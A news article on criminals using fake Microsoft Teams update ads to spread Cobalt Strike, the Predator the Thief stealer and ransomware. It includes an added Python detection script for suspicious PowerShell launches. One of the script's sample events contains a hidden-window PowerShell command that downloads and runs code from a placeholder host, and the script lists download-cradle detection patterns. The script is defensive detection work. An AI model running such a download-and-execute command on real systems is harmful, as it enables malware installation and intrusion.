Cybercriminals attach ransomware to deceptive advertisements for phony Microsoft Teams updates
In a series of recent cyber attacks, cybercriminals have been using deceitful tactics to infiltrate networks, with a particular focus on Microsoft's Teams software.
According to Microsoft, the attacks involve fake Microsoft 365 update ads which, when clicked, lead victims to domains under the attackers' control. This tactic is part of a broader strategy to deploy malware, including Cobalt Strike and the Predator the Thief stealer.
Cobalt Strike, a commercial penetration-testing tool, has become a popular choice among cybercriminals. When misused, it can compromise an entire network, performing reconnaissance, browser pivoting, and covert command-and-control communication. The group known as "Wizard Spider" is associated with Cobalt Strike attacks linked to Ryuk ransomware incidents.
Predator the Thief malware, originally discovered in 2018, is often found on hacking forums and performs typical functions of a stealer malware. Unlike other stealers written in C#, Predator is "fully written in C/C++."
In one reported attack, when a victim clicked on a malicious link, a PowerShell script was executed via a payload loader, resulting in the download of the Predator the Thief infostealer and Cobalt Strike beacons.
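The chain described above (a downloaded "update" binary spawning PowerShell, which then fetches further payloads) is exactly the kind of parent/child relationship an endpoint detection rule can key on. The following is an added example, not code from the original article or from Microsoft: it runs two defender-side checks over constructed process-creation events modelled on a Sysmon/EDR feed. The log format, directory patterns, lure-name keywords and the `example.invalid` URL are all assumptions made for the illustration.

```python
"""
Detection sketch for a fake-update lure that launches PowerShell.

Two independent signals are checked for every PowerShell process:
  1. its parent is an "update"-named binary living in a user-writable
     location (Downloads or the user's Temp directory), and
  2. its command line carries download-cradle or window-hiding indicators.

Event format and rules are constructed for this example and are not
taken from the article or from any vendor product.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged
    user: str


# Constructed sample events (not real telemetry). Event 300 models the
# chain in the article; event 500 is a benign admin script for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Program Files\Mozilla Firefox\firefox.exe",
                 "firefox.exe", "alice"),
    ProcessEvent(200, 100, r"C:\Users\alice\Downloads\TeamsUpdate.exe",
                 "TeamsUpdate.exe", "alice"),
    ProcessEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/a')\"", "alice"),
    ProcessEvent(400, 1, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 "OUTLOOK.EXE", "alice"),
    ProcessEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File C:\\scripts\\mailcleanup.ps1", "alice"),
]

# Assumed patterns; tune them to the environment's real software inventory.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\", re.I)
LURE_NAME = re.compile(r"(teams|office|365|update)", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|-enc\w*\s|-w(indowstyle)?\s+hidden)",
    re.I,
)


def find_suspicious_powershell(events):
    """Return a list of findings, one per PowerShell process that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not POWERSHELL.search(e.image):
            continue
        reasons = []
        parent = by_pid.get(e.ppid)
        if parent is not None:
            parent_name = parent.image.rsplit("\\", 1)[-1]
            if USER_WRITABLE.search(parent.image) and LURE_NAME.search(parent_name):
                reasons.append(
                    f"parent is an update-lure binary in a user-writable path: {parent.image}")
        if CRADLE.search(e.cmdline):
            reasons.append("command line contains download-cradle or hidden-window indicators")
        if reasons:
            # Both signals together are a much stronger case than either alone.
            severity = "high" if len(reasons) == 2 else "medium"
            findings.append({"pid": e.pid, "user": e.user,
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_powershell(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], f["user"])
        for r in f["reasons"]:
            print("   -", r)
```

In a production SIEM or EDR the same two conditions would be expressed as a query over process-creation telemetry; correlating the parent's download location with the child's command line is what keeps the rule from firing on every legitimate PowerShell launched by Outlook or a scheduled task, as the benign event 500 shows.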
IBM uncovered an overlap in code signing certificates between Cobalt Strike Beacon and Ryuk, suggesting a possible connection between the two. This discovery adds to the growing evidence linking Cobalt Strike to ransomware attacks.
The mass remote work environment increases the chance of success for these types of attacks, as employees may use personal devices without corporate email security protections. Microsoft encourages customers to practice good computing habits online, including exercising caution when clicking on links.
Employee awareness and training are key to mitigating these attacks, according to Dan L. Dodson, CEO of Fortified Health Security. He encourages employees to ask questions and learn from one another in the fight against cyber threats.
Microsoft suggests using Microsoft Defender ATP to mitigate the FakeUpdates risk, which is linked to the DoppelPaymer and WastedLocker ransomware strains. At least 60,000 parked domains became "malicious," or linked to phishing and malware, between March and September, according to Palo Alto Networks' Unit 42.
The reported attacks are using known tactics and tools, including Predator the Thief malware and Cobalt Strike. To disguise the malicious activity, a "legitimate copy" of Microsoft 365 was also installed in some cases. Microsoft is investigating these reports and will continue to provide updates as more information becomes available.